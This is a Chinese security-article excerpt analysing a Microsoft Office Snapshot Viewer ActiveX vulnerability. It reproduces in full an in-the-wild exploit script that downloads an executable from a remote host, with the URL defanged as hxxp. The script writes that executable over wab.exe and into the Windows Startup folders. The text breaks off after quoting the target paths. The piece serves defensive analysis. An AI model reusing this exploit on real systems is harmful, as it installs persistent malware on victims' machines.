网络安全 频道

无补丁?教你阻击最新Office漏洞

  贴出完整的代码如下:

1<script type="text/javascript">
2function killErrors() {
3return true;
4}
5window.onerror = killErrors;
6
7var x;
8var obj;
9var mycars = new Array();
10mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
11mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
12mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
13mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
14mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";
15
16var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
17
18if(objlcx="[object]")
19{
20
21setTimeout('window.location = "ldap://"',3000);
22
23for (x in mycars)
24{
25obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
26
27var buf1 = 'hxxp://jijiks8ahsda.cn/9/ck.exe';
28var buf2=mycars[x];
29
30obj.Zoom = 0;
31obj.ShowNavigationButtons = false;
32obj.AllowContextMenu = false;
33obj.SnapshotPath = buf1;
34
35try
36{
37 obj.CompressedPath = buf2;
38 obj.PrintSnapshot();
39
40}catch(e){}
41
42}
43}
44
45</script>

  其中http换成了hxxp防止误入。

  很明显,这个是Microsoft Office Snapshot Viewer ActiveX 漏洞利用代码,是Office系列软件中Access的漏洞,受这个漏洞影响的Access版本有2003、2002、2000,如果仅仅安装了Microsoft Snapshot Viewer 10.0.4622程序,也具有该漏洞。也难怪这个漏洞会使打全补丁的系统中招,目前官方没有给出补丁,其实世界上根本没有打全了补丁的系统。
我们看到代码中有这样的代码:

1mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
2mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
3mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
4mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
5mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";
6
0
相关文章